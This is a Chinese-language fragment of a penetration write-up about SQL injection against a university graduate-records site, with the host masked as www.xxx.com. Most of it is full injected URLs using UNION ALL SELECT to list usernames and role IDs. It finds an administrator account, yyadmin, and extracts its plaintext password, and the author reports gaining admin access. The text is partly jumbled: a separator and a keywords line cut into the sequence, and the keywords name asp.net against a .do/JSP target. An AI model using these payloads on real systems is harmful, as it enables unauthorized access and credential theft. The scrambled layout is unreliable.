http://www.xxx.com/messageviewlisting.do?method=query&criteria=2%3D1+
and+title+like+%27%252010%25%27 union all select
NULL,USERNAME,NULL,ROLENAME,ROLE_ID,NULL,NULL,NULL,NULL,NULL from
VW_GY_USER_REL_RULE where ROLE_ID<>'ff80808102e6b16e0102fd3761c200cf' and
ROLE_ID<>'402880711d2d9284011d2d987ee90001'
3
经过多次尝试,提交:
http://www.xxx.com/messageviewlisting.do?method=query&criteria=2%3D1+an
d+title+like+%27%252010%25%27 union all select
NULL,USERNAME,NULL,ROLENAME,ROLE_ID,NULL,NULL,NULL,NULL,NULL from
VW_GY_USER_REL_RULE where ROLE_ID<>'ff80808102e6b16e0102fd3761c200cf' and
ROLE_ID<>'402880711d2d9284011d2d987ee90001' and
ROLE_ID<>'402880d21997cadf011997cdd8cb0003' and
ROLE_ID<>'402880d2191321a60119135323d1001b' and
ROLE_ID<>'402880d2191321a60119134afc990012' and
ROLE_ID<>'402880befe8e9e8400fe8e9e84c30000' and
ROLE_ID<>'402880befe8e9e8400fe8ea9600f0004' and
ROLE_ID<>'402880d2191321a6011913549b8d001f' and
ROLE_ID<>'402880d2191321a60119134c01a50016'
我终于找到了“研究生学籍超级管理员” ,用户名是yyadmin。
赶快查询他的密码吧,提交:
管理员的密码是明文保存的,于是顺利地得到了后台管理员权限,但后来发现管理员使
用的功能十分有限,虽然最终并未得到jspshell,不过这也是一次非常曲折离奇的注入经
历了。
-------------------------------------------------------------------------------
前置知识:无
关键词;Public,asp.net,渗透
http://www.xxx.com/messageviewlisting.do?method=query&criteria=2%3D1+a
nd+title+like+%27%252010%25%27 union all select
NULL,USERNAME,NULL,ROLENAME,USERPW,NULL,NULL,NULL,NULL,NULL from
VW GY USERRELRULEwhereUSERNAME='yyadmin'
|